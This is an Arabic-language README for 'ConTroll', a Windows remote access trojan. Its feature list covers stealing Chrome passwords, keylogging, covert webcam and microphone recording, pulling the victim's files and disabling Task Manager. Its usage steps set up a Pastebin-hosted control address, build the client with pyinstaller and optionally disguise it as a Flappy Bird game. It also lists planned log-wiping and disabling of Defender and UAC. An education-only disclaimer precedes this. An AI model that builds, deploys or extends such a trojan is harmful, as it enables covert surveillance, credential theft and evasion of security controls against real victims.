
إخلاء مسؤولية
ConTroll مخصص لأغراض التعليم/البحث فقط. لا يتحمل المؤلف أي مسؤولية و/أو تبعة تجاه كيفية استخدامك لأي من الأدوات/الكود المصدري/أي ملفات مقدمة. لن يكون المؤلف أو أي شخص مرتبط به مسؤولاً عن أي خسائر و/أو أضرار تتعلق باستخدام أي من الملفات المقدمة مع ConTroll. باستخدامك لـ ConTroll أو أي ملفات مرفقة، فإنك تفهم أنك توافق على الاستخدام على مسؤوليتك الخاصة.
مرة أخرى، ConTroll وجميع الملفات المرفقة مخصصة لأغراض التعليم و/أو البحث فقط. ConTroll مخصص فقط للاستخدام في مختبرات الاختراق الخاصة بك، أو بموافقة صريحة من مالك الجهاز الذي يتم اختباره.
ConTroll - حصان طروادة للتحكم عن بعد (RAT)
شاهد فيديو العرض هنا
تم إنشاء حصان طروادة للتحكم عن بعد يفرض سيطرة إدارية على أي جهاز ويندوز يتم اختراقه.

التحديثات منذ عرض الفيديو
- تحديث عنوان IP والمنفذ الذي يجب أن يتصل به العميل عن بُعد
- إدخال عنوان IP عند تشغيل الخادم
- تعطيل إدارة المهام
الميزات
- قفل شاشة الضحية.
- إعادة الاتصال بالخادم تلقائيًا.
- إنشاء صندوق منبثق مخصص.
- سحب الملفات من جهاز الضحية.
- الحصول على معلومات حول جهاز الضحية.
- سرقة كلمات المرور المحفوظة في كروم.
- تفعيل كاميرا الويب الخاصة بالجهاز وتسجيل فيديو.
- تفعيل ميكروفون الجهاز وتسجيل الصوت.
- إنهاء أي عملية تعمل على جهاز الضحية.
- مراقبة سلوك المستخدم عبر قدرات تسجيل المفاتيح (ضغطات المفاتيح ولقطات الشاشة).
- تعطيل إدارة المهام. (تحذير: قد ترغب في تعطيل هذا إذا كنت تعمل محليًا)
المتطلبات
تحتاج إلى بنية معالج 32 بت لبناء الملفات الثنائية. لذا استخدم نظام ويندوز 32 أو يونكس 32 لتشغيل الكود وبنائه.
- python 2.x
- opencv
- numpy
- pyhook
- pythoncom
- pyinstaller
- pygame
- py2exe
- pyAudio
الاستخدام
جديد
قم بإعداد حساب PASTEBIN، وأنشئ لصقة جديدة تحتوي على عنوان IP ورقم المنفذ الذي تريد أن يرسل إليه العميل الاستجابات. يجب فصل عنوان IP ورقم المنفذ بنقطتين رأسيتين هكذا 192.168.12.14:5000. بعد إنشاء اللصقة، انقر على RAW، سيؤدي هذا إلى إعادة توجيهك إلى صفحة تحتوي فقط على عنوان IP ورقم المنفذ؛ انسخ ذلك الرابط والصقه في client.pyw في دالة getIpAddress. إذا أردت لأي سبب من الأسباب تحديث عنوان IP و/أو المنفذ الذي تريد أن يتصل به العميل، سجّل الدخول إلى حساب PASTEBIN وقم بإجراء التغييرات، واحفظها وسيتبنى العميل تلك التغييرات.
- استنساخ المستودع
git clone https://github.com/Lithium95/ConTroll_Remote_Access_Trojan.git
- تثبيت opencv و numpy من requirements.txt
python -m pip install -r requirements.txt
-
تنزيل وتثبيت pyHook
-
تنزيل وتثبيت pythoncom
-
تنزيل عجلة pyAudio
-
تثبيت ملف العجلة
python -m pip install PyAudio-0.2.11-cp27-cp27m-win32.whl
- استخدام pyinstaller لبناء الثنائي الخاص بالعميل
python pyinstaller.py --onefile --windowed client.pyw
تخطَّ الخطوتين التاليتين إذا كنت لا تريد استخدام لعبة flappy bird
- إعداد خادم محلي لاستضافة client.exe. استخدم live-server
- استخدام py2exe لبناء لعبة flappy bird
سيكون ملف exe الخاص بلعبة flappy bird في مجلد باسم 'dist'
- تشغيل الخادم
- انتظار اتصال العميل
المهام المتبقية
- جعل حصان طروادة متعدد المنصات
- مسح سجلات النظام والأمان والتطبيقات
- تشفير الاتصال بين الخادم والعميل
- تعديل خصائص الوصول والإنشاء والتعديل للملفات
- تمكين/تعطيل خدمات مثل RDP وUAC وWindows Defender